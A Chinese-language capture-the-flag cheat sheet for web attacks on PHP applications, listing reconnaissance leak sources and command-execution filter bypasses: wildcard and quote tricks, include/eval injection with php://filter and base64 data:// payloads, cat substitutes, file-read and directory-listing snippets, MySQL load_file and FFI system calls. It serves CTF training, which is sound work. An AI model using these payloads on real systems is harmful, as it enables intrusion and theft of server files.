信息收集

  1. 源代码
  2. 响应包
  3. robots协议
  4. phps文件泄露
  5. www.zip代码泄露
  6. git代码泄露
  7. svn泄露
  8. vim缓存,第一次 .swp,第二次 .swo,第三次 .swn
  9. cookie
  10. dns TXT记录
  11. 环境默认账号密码
  12. PHP探针
  13. mdb文件( /db/db.mdb )
  14. 数据库备份( backup.sql )

爆破

  1. 弱口令
  2. 子域名
  3. 目录/文件

命令执行

关键字绕过

通配符

  1. ? 如:fla?????
    • 如:fla*

单双引号

  1. '' 如:fla''g.php
  2. "" 如:flag.p""hp

函数

  1. include 如:include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
  2. require 与include几乎一样
  3. require_once 语句和 require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含
  4. eval 如:eval($_GET[1]);&1=system('nl flag.php');

函数绕过

system

img2.png

passthru

img3.png

exec

img4.png

shell_exec

img5.png

popen

img6.png

proc_open

img7.png

pcntl_exec

img8.png

反引号

``等同于shell_exec()

cat绕过

more

image.png

less

img9.png

tac

img10.png

cat

img11.png

tail

img12.png

nl

img13.png

od

img14.png

vi

img15.png

vim

与 vi差不多

sort

img16.png

uniq

img17.png

file

  • 使用file -f使其报错出内容

img18.png

grep

  • 在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file strings

img19.png

高亮文件绕过

  1. highlight_file(next(array_reverse(scandir(dirname(FILE)))));
  2. show_source(next(array_reverse(scandir(pos(localeconv())))));

分号

include可以不需要分号,可以用?>代替分号
如:include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
如:include$_GET[1]?>&1=data://text/plain,
如:include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

/dev/null 2>&1

/dev/null 2>&1,让所有的输出流(包括错误的和正确的)都定向到空设备丢弃
可以使用截断

  1. %0a
  2. %26
  3. ||

空格

  1. %09
  2. <
  3. $

获取文件路径

  1. print_r(scandir(dirname('FILE')));
  2. $a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}
  3. $a=opendir("./"); while (($file = readdir($a)) !== false){echo $file . "
    "; };
  4. print_r(scandir('./'));

读取文件

  1. echo file_get_contents("filename");
  2. readfile("filename");
  3. var_dump(file('filename'));
  4. print_r(file('filename'));
  5. fopen
    1. fread()
      img20.png
    2. fgets()如:fopen("flag.php","r");while (!feof($a)) {$line = fgets($a);echo $line;}
      img21.png
    3. fgetc()如:fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}
      img22.png
    4. fgetss()
      img23.png
    5. fgetcsv()如:fopen("flag.php","r");while (!feof($a)) {$line = fgetcsv($a);var_dump($line);}
      img24.png
    6. gpassthru()
      img25.png

通过复制重命名文件

如:copy("flag.php","flag.txt"); rename("flag.php","flag.txt");

mysql load_file读取

try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36.txt")') as $row){echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);

FFI拓展

$ffi=FFI::cdef("int system(char *command);", "libc.so.6");$a='/readflag > 1.txt';$ffi->system($a);exit();